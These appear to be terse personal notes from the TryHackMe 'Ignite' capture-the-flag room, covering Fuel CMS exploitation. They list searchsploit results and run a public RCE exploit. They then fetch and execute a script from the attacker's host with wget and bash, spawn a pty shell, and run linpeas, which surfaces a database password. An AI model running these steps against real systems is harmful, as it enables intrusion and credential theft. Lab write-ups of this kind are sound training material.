
searchsploit Fuel 1.4
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1)                           | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                           | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                           | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)          | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)                 | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)     | php/webapps/48778.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                           
searchsploit -m php/webapps/50477.py
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
      URL: https://www.exploit-db.com/exploits/50477
     Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
File Type: Python script, ASCII text executable

Copied to: /home/gd/Desktop/THM/ignite/50477.py

python3 50477.py -u http://ignite.thm

on my machine
python3 -m http.server

wget 10.11.52.16:8000/s.sh && bash s.sh 

which python3
python3 -c "import pty; pty.spawn('/bin/bash')"

wget 10.11.52.16:8000/linpeas.sh

./linpeas.sh
....
╔══════════╣ Searching passwords in config PHP files
        'password' => 'mememe', 
....        

Analyzing Backup Manager Files (limit 70)
storage.php Not Found                                                                                                                                
                                                                                                                                                     
-rwxrwxrwx 1 root root 4646 Jul 26  2019 /var/www/html/fuel/application/config/database.php
|       ['password'] The password used to connect to the database
|       ['database'] The name of the database you want to connect to
        'password' => 'mememe',
        'database' => 'fuel_schema',


find / -name database.php 2>&1 | grep -v “Permission denied”


b9bbcb33e11b80be759c4e844862482d

https://tryhackme.com/room/ignite
